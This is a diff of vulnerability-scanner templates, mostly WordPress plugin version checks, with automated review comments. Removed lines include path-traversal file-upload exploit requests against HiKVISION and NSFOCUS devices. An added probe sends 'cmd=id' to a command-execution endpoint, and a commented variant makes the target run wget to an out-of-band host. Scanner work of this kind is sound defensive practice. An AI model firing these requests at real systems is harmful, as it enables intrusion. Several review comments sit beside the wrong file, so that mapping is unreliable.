+ The WPZOOM Portfolio Lite – Filterable Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘align’ attribute within the 'wp:wpzoom-blocks' Gutenberg block in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2e7d5503-0a6e-4611-bb7c-b2871be828be?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-8276
+ metadata:
+ fofa-query: "wp-content/plugins/wpzoom-portfolio/"
+ google-query: inurl:"/wp-content/plugins/wpzoom-portfolio/"
+ shodan-query: 'vuln:CVE-2024-8276'
+ tags: cve,wordpress,wp-plugin,wpzoom-portfolio,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpzoom-portfolio/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpzoom-portfolio"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.4')
\ No newline at end of file
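Review bot: `severity: low` contradicts the template's own `cvss-score: 6.4` (vector `AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N`), which falls in the CVSS 3.1 Medium band, so the severity and the trailing `low` in `tags:` should be `medium`. The file is also placed under `poc/sql/` although the name and description describe stored cross-site scripting, not SQL injection, which will mislead anyone selecting templates by directory. The same Wordfence advisory (`2e7d5503-...`) is added a second time in this commit as `poc/wordpress/wpzoom-portfolio-dcf59e...yaml`; keeping only one copy, preferably this one with the populated `cve-id`, avoids double findings. Note that matching `Stable tag` in `readme.txt` is a version fingerprint, not a test of the XSS itself, so the description could say "possibly vulnerable version detected".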
diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml index 538f6fd6d5..cd961f6e81 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml 
@@ -1,35 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" - http: - - raw: - - | - POST /center/api/files;.html HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a-- - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "test.jsp")' - condition: and + - type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml index a8f9cbe173..b35ef84818 100644 --- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml 
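Review bot: The new `author:` value is mangled, `author: zerZero Trust Security Attack and Defense Laboratoryo`, and should read `author: Zero Trust Security Attack and Defense Laboratory` as it did before the change. The template's body now probes `/artemis-portal/artemis/env` for an information leak, yet `id: HiKVISION` is unchanged and the file still lives at `poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml`, so the id and path no longer describe the check and the id does not look unique across the repository. Matching only the word `profiles` with a 200 status is a thin fingerprint that an unrelated page could satisfy; if the endpoint is a Spring-style environment dump, as the name suggests, adding a second expected key would reduce false positives, but that should be confirmed against a real response before hard-coding it.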
+++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml 
@@ -1,59 +1,49 @@ id: Green-Alliance info: - name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability + name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets + Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability metadata: - fofa-query: app="NSFOCUS-下一代防火墙" - hunter-query: web.title="用户认证 - NSFOCUS NF" - + fofa-query: body="'/needUsbkey.php?username='" + hunter-query: web.body="'/needUsbkey.php?username='" http: - - raw: - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 238 - Accept-Encoding: gzip, deflate - Connection: close - - --1d52ba2a11ad8a915eddab1a0e85acd9 - Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" - - lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; - --1d52ba2a11ad8a915eddab1a0e85acd9-- - - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 217 - Accept-Encoding: gzip, deflate - Connection: close - - --4803b59d015026999b45993b1245f0ef - Content-Disposition: form-data; name="file"; filename="compose.php" - - - --4803b59d015026999b45993b1245f0ef-- - - - | - GET /mail/include/header_main.php HTTP/1.1 - Host: {{Host}}:4433 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; 
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 - Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 + - method: GET + path: + - "{{BaseURL}}/webconf/Exec/index?cmd=id" + matchers-condition: and matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && contains(body_1, 'upload file success')" - - "status_code_2 == 200 && contains(body_2, 'upload file success')" - - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" - condition: and + - type: word + part: body + words: + - "200" + + - type: status + status: + - 200 + + +# http: +# - method: GET +# path: +# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" + +# attack: clusterbomb +# matchers-condition: or +# matchers: +# - type: word +# part: interactsh_protocol +# name: http +# words: +# - "http" + +# - type: word +# part: interactsh_protocol +# name: dns +# words: +# - "dns" diff --git a/poc/web/web-application-firewall-aecd7866e19c9efd3d56871b357c8881.yaml b/poc/web/web-application-firewall-aecd7866e19c9efd3d56871b357c8881.yaml new file mode 100644 index 0000000000..fd4052d4c9 --- /dev/null +++ b/poc/web/web-application-firewall-aecd7866e19c9efd3d56871b357c8881.yaml 
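Review bot: The new matcher `words: - "200"` on the response body is not meaningful: it fires on any page that contains the digits 200, and combined with the 200 status matcher it effectively reports every reachable `/webconf/Exec/index` as exploitable. Since the request runs `cmd=id`, the evidence of execution is the command output, so match on that instead, e.g. `words: - "uid=" - "gid="` with `condition: and`. The template also keeps `id: Green-Alliance` and the path `poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml` although the check is now a SAS bastion command-execution probe, and the commented-out `interactsh` variant at the bottom is dead text that should either be wired in as a second request or dropped.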
@@ -0,0 +1,59 @@
+id: web-application-firewall-aecd7866e19c9efd3d56871b357c8881
+
+info:
+ name: >
+ Web Application Firewall <= 2.1.2 - IP Address Spoofing to Protection Mechanism Bypass
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e99531c-8742-4f91-8525-65bb3cb06644?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/web-application-firewall/"
+ google-query: inurl:"/wp-content/plugins/web-application-firewall/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,web-application-firewall,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/web-application-firewall/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "web-application-firewall"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.2')
\ No newline at end of file
diff --git a/poc/wordpress/ip-vault-wp-firewall-5048b84b845dea0b88ed33d7dc34347e.yaml b/poc/wordpress/ip-vault-wp-firewall-5048b84b845dea0b88ed33d7dc34347e.yaml
new file mode 100644
index 0000000000..bd683463e6
--- /dev/null
+++ b/poc/wordpress/ip-vault-wp-firewall-5048b84b845dea0b88ed33d7dc34347e.yaml
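Review bot: `cve-id:`, `cvss-metrics:` and `cvss-score:` are all empty, yet `tags:` starts with `cve` and `shodan-query: 'vuln:'` is an empty filter; either fill them from the referenced Wordfence advisory or drop the `cve` tag and the `shodan-query` line so the metadata does not claim a CVE that is not there. `description: >` is likewise blank, which leaves a finding with no explanation of what "IP Address Spoofing to Protection Mechanism Bypass" means for the operator. The checks only compare the `Stable tag` from `readme.txt` against `<= 2.1.2`; they never send a spoofed client-IP header, so a match proves an old version is installed, not that the bypass works, and the name or description should make that distinction.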
@@ -0,0 +1,59 @@
+id: ip-vault-wp-firewall-5048b84b845dea0b88ed33d7dc34347e
+
+info:
+ name: >
+ IP Vault – WP Firewall <= 1.1 - IP Address Spoofing to Protection Mechanism Bypass
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/66e89753-f83e-4e60-b165-6d3d101d6c59?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ip-vault-wp-firewall/"
+ google-query: inurl:"/wp-content/plugins/ip-vault-wp-firewall/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ip-vault-wp-firewall,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ip-vault-wp-firewall/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ip-vault-wp-firewall"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-cerber-4a64f9ad31b78ab78c48428c5a85590b.yaml b/poc/wordpress/wp-cerber-4a64f9ad31b78ab78c48428c5a85590b.yaml
new file mode 100644
index 0000000000..257f35c6b6
--- /dev/null
+++ b/poc/wordpress/wp-cerber-4a64f9ad31b78ab78c48428c5a85590b.yaml
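Review bot: The `tags:` list carries `cve` while `cve-id:` is empty, and `shodan-query: 'vuln:'` has no value, so consumers filtering on `-tags cve` or exporting the Shodan query get a false signal; drop both or populate them from the Wordfence reference. With `description: >` left blank the report will show a name only, so a one-line description of the spoofing bypass and which header it involves would help the reader. As with the sibling templates, `compare_versions(version, '<= 1.1')` on the readme `Stable tag` is a version fingerprint rather than a check that the protection can actually be bypassed.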
@@ -0,0 +1,59 @@
+id: wp-cerber-4a64f9ad31b78ab78c48428c5a85590b
+
+info:
+ name: >
+ WP Cerber Security <= 9.4 - IP Protection Bypass
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/03ccd474-42f4-4cbb-823e-93fe4db1bf80?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-cerber/"
+ google-query: inurl:"/wp-content/plugins/wp-cerber/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-cerber,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-cerber/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-cerber"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 9.4')
\ No newline at end of file
diff --git a/poc/wordpress/wp-events-manager-29722e1d187e63b6b325ae129c9c70d3.yaml b/poc/wordpress/wp-events-manager-29722e1d187e63b6b325ae129c9c70d3.yaml
new file mode 100644
index 0000000000..27678d7964
--- /dev/null
+++ b/poc/wordpress/wp-events-manager-29722e1d187e63b6b325ae129c9c70d3.yaml
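Review bot: `cve-id:` is empty but `tags: cve,...` and `shodan-query: 'vuln:'` are emitted anyway, so the template advertises a CVE it does not name; remove the `cve` tag and the empty `shodan-query`, or fill in the identifier if the Wordfence advisory has one. `description: >` is blank, leaving no statement of what "IP Protection Bypass" means operationally. The word matcher `"wp-cerber"` on `readme.txt` is satisfied by the plugin slug itself, so it adds little beyond the 200 status; the real discriminator is `compare_versions(version, '<= 9.4')`, which should be called out in the name as a version check rather than a confirmed bypass.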
@@ -0,0 +1,59 @@
+id: wp-events-manager-29722e1d187e63b6b325ae129c9c70d3
+
+info:
+ name: >
+ WP Events Manager <= 2.1.11 - Authenticated (Subscriber+) Time-Based SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/88dc08ff-3966-4606-855c-57c25552599e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-events-manager/"
+ google-query: inurl:"/wp-content/plugins/wp-events-manager/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-events-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-events-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-events-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.11')
\ No newline at end of file
diff --git a/poc/wordpress/wpzoom-portfolio-dcf59e219d34d9e2d14f575ceb25f541.yaml b/poc/wordpress/wpzoom-portfolio-dcf59e219d34d9e2d14f575ceb25f541.yaml
new file mode 100644
index 0000000000..17a01e4d56
--- /dev/null
+++ b/poc/wordpress/wpzoom-portfolio-dcf59e219d34d9e2d14f575ceb25f541.yaml
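Review bot: `severity: low` for an authenticated time-based SQL injection looks understated, but with `cvss-metrics:` and `cvss-score:` left empty there is nothing in the template to justify either value; pull the vector from the Wordfence advisory and set the severity from it, updating the trailing `low` in `tags:` to match. `cve-id:` is blank while the `cve` tag and `shodan-query: 'vuln:'` are present, which mislabels the finding. The template never issues the injection request, only a `readme.txt` version comparison, so `description: >` should be filled in to say that a match indicates a version in the affected range rather than a confirmed injectable endpoint.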
@@ -0,0 +1,59 @@
+id: wpzoom-portfolio-dcf59e219d34d9e2d14f575ceb25f541
+
+info:
+ name: >
+ WPZOOM Portfolio Lite – Filterable Portfolio Plugin <= 1.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2e7d5503-0a6e-4611-bb7c-b2871be828be?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wpzoom-portfolio/"
+ google-query: inurl:"/wp-content/plugins/wpzoom-portfolio/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wpzoom-portfolio,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpzoom-portfolio/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpzoom-portfolio"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.4')
\ No newline at end of file
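Review bot: This template is a second copy of the `CVE-2024-8276-abcb5005...yaml` added earlier in the same commit: same Wordfence advisory `2e7d5503-...`, same request, same `compare_versions(version, '<= 1.4.4')` matcher, but with `cve-id:`, `cvss-metrics:`, `cvss-score:` and `description:` stripped. Running both yields duplicate findings for every host, so one should be dropped, and the surviving one should keep the populated `cve-id: CVE-2024-8276` and CVSS fields. If this copy is the one retained, at minimum restore `cve-id: CVE-2024-8276` and `shodan-query: 'vuln:CVE-2024-8276'`, since the `cve` tag is meaningless with an empty identifier.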